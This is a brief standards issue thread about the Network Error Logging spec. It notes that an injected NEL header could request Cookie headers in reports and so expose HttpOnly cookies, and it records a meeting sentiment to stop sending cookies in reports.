NEL header injection attack allows stealing HttpOnly cookies

[chlily1]

If an attacker is able to inject a NEL header that requests that Cookie headers be sent in the request_headers report field, then any HttpOnly cookies could also be stolen, which would not be possible with a regular header injection attack.

[clelland]

Discussed at TPAC, and the sentiment in the room was that we perhaps should simply not send cookies in reports.